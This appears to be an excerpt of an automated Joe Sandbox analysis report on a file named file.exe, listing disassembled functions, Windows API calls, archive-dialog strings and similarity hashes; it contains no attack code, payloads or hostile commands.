              • API ID: Resource$Object$DeleteLoad$BitmapFindLockSizeof
              • String ID: ]
              • API String ID: 142272564-3352871620
              • Opcode ID: 4ce15d7aca9778d5cc94e7bf604fa47ea272a7c80df5c4c7388b88707842a3e5
              • Instruction ID: d8dffd37430eee71362f4609b2b6c5148c9e583dadeb615ce370ca2a7e851a47
              • Opcode Fuzzy Hash: 4ce15d7aca9778d5cc94e7bf604fa47ea272a7c80df5c4c7388b88707842a3e5
              • Instruction Fuzzy Hash: CF01C432540615A7DF1067689C45A7FBBEDEF81B52F1800B9BD00AB292DE728C1586A2
              Function 00B9CC90 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON
              Download Yara Rule
              APIs
                • Part of subcall function 00B8130B: GetDlgItem.USER32(00000000,00003021), ref: 00B8134F
                • Part of subcall function 00B8130B: SetWindowTextW.USER32(00000000,00BB35B4), ref: 00B81365
              • EndDialog.USER32(?,00000001), ref: 00B9CCDB
              • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 00B9CCF1
              • SetDlgItemTextW.USER32(?,00000066,?), ref: 00B9CD05
              • SetDlgItemTextW.USER32(?,00000068), ref: 00B9CD14
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: ItemText$DialogWindow
              • String ID: RENAMEDLG
              • API String ID: 445417207-3299779563
              • Opcode ID: b3274aa90a0b446da0d0d8f84ff43bb4fc579255d51e22ed7151f48d23613343
              • Instruction ID: 7a977e5f664e392596b6f3d09c692ba2e7da714f15dcb834943865e840b3a6bf
              • Opcode Fuzzy Hash: b3274aa90a0b446da0d0d8f84ff43bb4fc579255d51e22ed7151f48d23613343
              • Instruction Fuzzy Hash: 540128322852107BEA115F649C48F677FEDEB5A702F104471F345AB0E1CBA19A04CBB5
              Function 00BA75C2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00BA7573,00000000,?,00BA7513,00000000,00BBBAD8,0000000C,00BA766A,00000000,00000002), ref: 00BA75E2
              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00BA75F5
              • FreeLibrary.KERNEL32(00000000,?,?,?,00BA7573,00000000,?,00BA7513,00000000,00BBBAD8,0000000C,00BA766A,00000000,00000002), ref: 00BA7618
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: AddressFreeHandleLibraryModuleProc
              • String ID: CorExitProcess$mscoree.dll
              • API String ID: 4061214504-1276376045
              • Opcode ID: 2e01212982ad1d11e8eeb2844a461a5b2ffbc85fb0787a1078a4498feb25c9c9
              • Instruction ID: dd9db2abadce15de72582fb17875972d6e2d4657770659aabb2122353b81e272
              • Opcode Fuzzy Hash: 2e01212982ad1d11e8eeb2844a461a5b2ffbc85fb0787a1078a4498feb25c9c9
              • Instruction Fuzzy Hash: B7F03130A58518BBDB15AB58DC09BEDBBF9EF04711F0041A9E805A3160DFB09A41CA54
              Function 00B8EB73 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON
              Download Yara Rule
              APIs
                • Part of subcall function 00B90085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00B900A0
                • Part of subcall function 00B90085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00B8EB86,Crypt32.dll,00000000,00B8EC0A,?,?,00B8EBEC,?,?,?), ref: 00B900C2
              • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00B8EB92
              • GetProcAddress.KERNEL32(00BC81C0,CryptUnprotectMemory), ref: 00B8EBA2
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: AddressProc$DirectoryLibraryLoadSystem
              • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
              • API String ID: 2141747552-1753850145
              • Opcode ID: 15f56f3abbd074e4b0f802c27b628d86d2408f093b16b8ca05a061ac9e6d6c67
              • Instruction ID: e38f44019b9c6676da4ff064683e910974c8b9c9df93baaf1fe52a543260821d
              • Opcode Fuzzy Hash: 15f56f3abbd074e4b0f802c27b628d86d2408f093b16b8ca05a061ac9e6d6c67
              • Instruction Fuzzy Hash: 06E04F70845741AFCB20AF349848B96BAE49F14B00B04889DE4E6D31A0DAF5D5408B50
              Function 00BA7DD9 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: _free
              • String ID:
              • API String ID: 269201875-0
              • Opcode ID: d5d10432d47d5ac4f34d20db624f99934601ea57b33b4dd13096d6e6c0ba1b9d
              • Instruction ID: 082aebdec0e79de3915a516cc759345b51593741bcad929700b3887da70ee2fb
              • Opcode Fuzzy Hash: d5d10432d47d5ac4f34d20db624f99934601ea57b33b4dd13096d6e6c0ba1b9d
              • Instruction Fuzzy Hash: D2418132A483049FDB24DF78C881A9EB7EAEF8A714B1545E9E515EB351DB31ED01CB80
              Function 00BAB610 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
              Download Yara Rule
              APIs
              • GetEnvironmentStringsW.KERNEL32 ref: 00BAB619
              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00BAB63C
                • Part of subcall function 00BA8518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00BAC13D,00000000,?,00BA67E2,?,00000008,?,00BA89AD,?,?,?), ref: 00BA854A
              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00BAB662
              • _free.LIBCMT ref: 00BAB675
              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00BAB684
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
              • String ID:
              • API String ID: 336800556-0
              • Opcode ID: 07a1d5f5a8eebbc459892090682b36fbd2757b8a4f07f25c0febcf025c842cf2
              • Instruction ID: f071f99a91e9119c27ae0dfdfe0147495f492433157ba17de75e6a64649a8d76
              • Opcode Fuzzy Hash: 07a1d5f5a8eebbc459892090682b36fbd2757b8a4f07f25c0febcf025c842cf2
              • Instruction Fuzzy Hash: FF01A772609615BF632156BE6C8CC7BAAEDDEC7FA031502A9FD14D3216DFA0CD4191B0
              Function 00BA9029 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • GetLastError.KERNEL32(?,00BC0EE8,00000200,00BA895F,00BA58FE,?,?,?,?,00B8D25E,?,030F3810,00000063,00000004,00B8CFE0,?), ref: 00BA902E
              • _free.LIBCMT ref: 00BA9063
              • _free.LIBCMT ref: 00BA908A
              • SetLastError.KERNEL32(00000000,00BB3958,00000050,00BC0EE8), ref: 00BA9097
              • SetLastError.KERNEL32(00000000,00BB3958,00000050,00BC0EE8), ref: 00BA90A0
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: ErrorLast$_free
              • String ID:
              • API String ID: 3170660625-0
              • Opcode ID: 956a7e33a6e329ed9c9bb00f22c9f409b17ee099a8f6870e1415b44354241fa3
              • Instruction ID: f4d686a25780ffaf1d08ebd2784988b7e3947431f6f2831335f17f4ad6b6d061
              • Opcode Fuzzy Hash: 956a7e33a6e329ed9c9bb00f22c9f409b17ee099a8f6870e1415b44354241fa3
              • Instruction Fuzzy Hash: 7001F43254DA006B933237396C85A2B26DEDFD37F132002A5F61A93262EFB4CC01A160
              Function 00B9075B Relevance: 7.5, APIs: 5, Instructions: 44COMMON
              Download Yara Rule
              APIs
                • Part of subcall function 00B90A41: ResetEvent.KERNEL32(?), ref: 00B90A53
                • Part of subcall function 00B90A41: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00B90A67
              • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00B9078F
              • CloseHandle.KERNEL32(?,?), ref: 00B907A9
              • DeleteCriticalSection.KERNEL32(?), ref: 00B907C2
              • CloseHandle.KERNEL32(?), ref: 00B907CE
              • CloseHandle.KERNEL32(?), ref: 00B907DA
                • Part of subcall function 00B9084E: WaitForSingleObject.KERNEL32(?,000000FF,00B90A78,?), ref: 00B90854
                • Part of subcall function 00B9084E: GetLastError.KERNEL32(?), ref: 00B90860
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
              • String ID:
              • API String ID: 1868215902-0
              • Opcode ID: e06c1522dd2d94e7c82821e76b11a12329163abb599e7898d1e6a139b07480e5
              • Instruction ID: 5196c47fa8ce4c1dba496483251c4e5899e63d3d45091971eb77ee40bd50c72e
              • Opcode Fuzzy Hash: e06c1522dd2d94e7c82821e76b11a12329163abb599e7898d1e6a139b07480e5
              • Instruction Fuzzy Hash: 2C019271544B04EFCB21AB69DC84FC6BBE9FF48B10F400669F15A82160CBB57A44CB90
              Function 00BABF10 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • _free.LIBCMT ref: 00BABF28
                • Part of subcall function 00BA84DE: RtlFreeHeap.NTDLL(00000000,00000000,?,00BABFA7,00BB3958,00000000,00BB3958,00000000,?,00BABFCE,00BB3958,00000007,00BB3958,?,00BAC3CB,00BB3958), ref: 00BA84F4
                • Part of subcall function 00BA84DE: GetLastError.KERNEL32(00BB3958,?,00BABFA7,00BB3958,00000000,00BB3958,00000000,?,00BABFCE,00BB3958,00000007,00BB3958,?,00BAC3CB,00BB3958,00BB3958), ref: 00BA8506
              • _free.LIBCMT ref: 00BABF3A
              • _free.LIBCMT ref: 00BABF4C
              • _free.LIBCMT ref: 00BABF5E
              • _free.LIBCMT ref: 00BABF70
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: _free$ErrorFreeHeapLast
              • String ID:
              • API String ID: 776569668-0
              • Opcode ID: 4afa0989b66edc88bfef39af5c594fc374adea94e9a1783e73b05a0cb7926fcc
              • Instruction ID: 61ef315e70a75c300fb562e8e80bd06cf62501aefa33d9e477fc75d6c74d06f0
              • Opcode Fuzzy Hash: 4afa0989b66edc88bfef39af5c594fc374adea94e9a1783e73b05a0cb7926fcc
              • Instruction Fuzzy Hash: DCF0123250C201AB9620EB68EEC6C5A73DAFA067107684D99F029D7E21CF71FC808A54
              Function 00BA8060 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
              Download Yara Rule
              APIs
              • _free.LIBCMT ref: 00BA807E
                • Part of subcall function 00BA84DE: RtlFreeHeap.NTDLL(00000000,00000000,?,00BABFA7,00BB3958,00000000,00BB3958,00000000,?,00BABFCE,00BB3958,00000007,00BB3958,?,00BAC3CB,00BB3958), ref: 00BA84F4
                • Part of subcall function 00BA84DE: GetLastError.KERNEL32(00BB3958,?,00BABFA7,00BB3958,00000000,00BB3958,00000000,?,00BABFCE,00BB3958,00000007,00BB3958,?,00BAC3CB,00BB3958,00BB3958), ref: 00BA8506
              • _free.LIBCMT ref: 00BA8090
              • _free.LIBCMT ref: 00BA80A3
              • _free.LIBCMT ref: 00BA80B4
              • _free.LIBCMT ref: 00BA80C5
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: _free$ErrorFreeHeapLast
              • String ID:
              • API String ID: 776569668-0
              • Opcode ID: 7cc0d71f5a345b1e6005c42350c039a3341886b81757a611252acd3a30ce77f1
              • Instruction ID: 4b6a7758974736e69ee36af1ac0c4584897bb6c9a5f650664287806420570cdf
              • Opcode Fuzzy Hash: 7cc0d71f5a345b1e6005c42350c039a3341886b81757a611252acd3a30ce77f1
              • Instruction Fuzzy Hash: 0DF03A748055658F97117F19BC814853BA6F71A7203284E9AF4119FF70CF718892AFD1
              Function 00BA76BD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
              Download Yara Rule
              APIs
              • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\file.exe,00000104), ref: 00BA76FD
              • _free.LIBCMT ref: 00BA77C8
              • _free.LIBCMT ref: 00BA77D2
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: _free$FileModuleName
              • String ID: C:\Users\user\Desktop\file.exe
              • API String ID: 2506810119-4010620828
              • Opcode ID: 1c1bb98b8ed2afa12d052c246c206f9e4fce938194c4ca4acc3329082b58033b
              • Instruction ID: e54bb50ca1e3ebba78e90fa6de960268ccc73adcf2d2fe497b622261b4f59a4f
              • Opcode Fuzzy Hash: 1c1bb98b8ed2afa12d052c246c206f9e4fce938194c4ca4acc3329082b58033b
              • Instruction Fuzzy Hash: D8316071A4C258AFDB21EF99DCC5D9EBBFCEB86710B2440E6E40497211DE708E40CB91
              Function 00B87574 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 93COMMON
              Download Yara Rule
              APIs
              • __EH_prolog.LIBCMT ref: 00B87579
                • Part of subcall function 00B83B3D: __EH_prolog.LIBCMT ref: 00B83B42
              • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 00B87640
                • Part of subcall function 00B87BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 00B87C04
                • Part of subcall function 00B87BF5: GetLastError.KERNEL32 ref: 00B87C4A
                • Part of subcall function 00B87BF5: CloseHandle.KERNEL32(?), ref: 00B87C59
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
              • String ID: SeRestorePrivilege$SeSecurityPrivilege
              • API String ID: 3813983858-639343689
              • Opcode ID: 4946e9b71a21afde1535802afe95da29c4d41cea7f0414ef9e8bfe8406775958
              • Instruction ID: 8cf009eed4c9884be19ba3bb84cdacb096b13e024e2763d8e56041048fdcc698
              • Opcode Fuzzy Hash: 4946e9b71a21afde1535802afe95da29c4d41cea7f0414ef9e8bfe8406775958
              • Instruction Fuzzy Hash: 6F319C71948248AEDF20FB68DC41FEE7BE9EF14758F1041A9F445A71A2DFB08A44C7A0
              Function 00B9A430 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON
              Download Yara Rule
              APIs
                • Part of subcall function 00B8130B: GetDlgItem.USER32(00000000,00003021), ref: 00B8134F
                • Part of subcall function 00B8130B: SetWindowTextW.USER32(00000000,00BB35B4), ref: 00B81365
              • EndDialog.USER32(?,00000001), ref: 00B9A4B8
              • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 00B9A4CD
              • SetDlgItemTextW.USER32(?,00000066,?), ref: 00B9A4E2
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: ItemText$DialogWindow
              • String ID: ASKNEXTVOL
              • API String ID: 445417207-3402441367
              • Opcode ID: cf35a8f7c4b3d573049ba7e671e6d3ac9f2a36b79a8847c500abc1bc5499a8f7
              • Instruction ID: 6058576553e512e7e0e7e5f169b324b0e694d06bfa4c159c3b16d191469f98b9
              • Opcode Fuzzy Hash: cf35a8f7c4b3d573049ba7e671e6d3ac9f2a36b79a8847c500abc1bc5499a8f7
              • Instruction Fuzzy Hash: 631196322442507FDA21AFA8DC8DF667BEDEB46700F2004A5F2419B3B1CBE19941DB63
              Function 00B8D1C3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON
              Download Yara Rule
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: __fprintf_l_strncpy
              • String ID: $%s$@%s
              • API String ID: 1857242416-834177443
              • Opcode ID: 513ba32c814811e28b7f60ee32f38f35b1b1891c75be377092e460930357898d
              • Instruction ID: b83f323915ccd1dacb74973225bf90daf3077938e8d83cb0f51000a5ed2ae3aa
              • Opcode Fuzzy Hash: 513ba32c814811e28b7f60ee32f38f35b1b1891c75be377092e460930357898d
              • Instruction Fuzzy Hash: 53215E72540209ABEF20EEA4CC46FEE7BE8EF05700F1405A2FE15961B2E371EA55DB51
              Function 00B9A990 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON
              Download Yara Rule
              APIs
                • Part of subcall function 00B8130B: GetDlgItem.USER32(00000000,00003021), ref: 00B8134F
                • Part of subcall function 00B8130B: SetWindowTextW.USER32(00000000,00BB35B4), ref: 00B81365
              • EndDialog.USER32(?,00000001), ref: 00B9A9DE
              • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 00B9A9F6
              • SetDlgItemTextW.USER32(?,00000067,?), ref: 00B9AA24
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: ItemText$DialogWindow
              • String ID: GETPASSWORD1
              • API String ID: 445417207-3292211884
              • Opcode ID: d80628c94edf9877cf817dc52b59b4467b428b0169da7a2fd324800170c7227f
              • Instruction ID: 6d5fdaeec3fcdb415dc41c5b67d15d4ac5512f5e28d3bcea2f88d3090a25cf7f
              • Opcode Fuzzy Hash: d80628c94edf9877cf817dc52b59b4467b428b0169da7a2fd324800170c7227f
              • Instruction Fuzzy Hash: 541104329401187BDF21AA649D89FFA7BECFB49711F0000B1FA45B7091C6A19951D7B2
              Function 00B8B4F7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
              Download Yara Rule
              APIs
              • _swprintf.LIBCMT ref: 00B8B51E
                • Part of subcall function 00B8400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B8401D
              • _wcschr.LIBVCRUNTIME ref: 00B8B53C
              • _wcschr.LIBVCRUNTIME ref: 00B8B54C
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
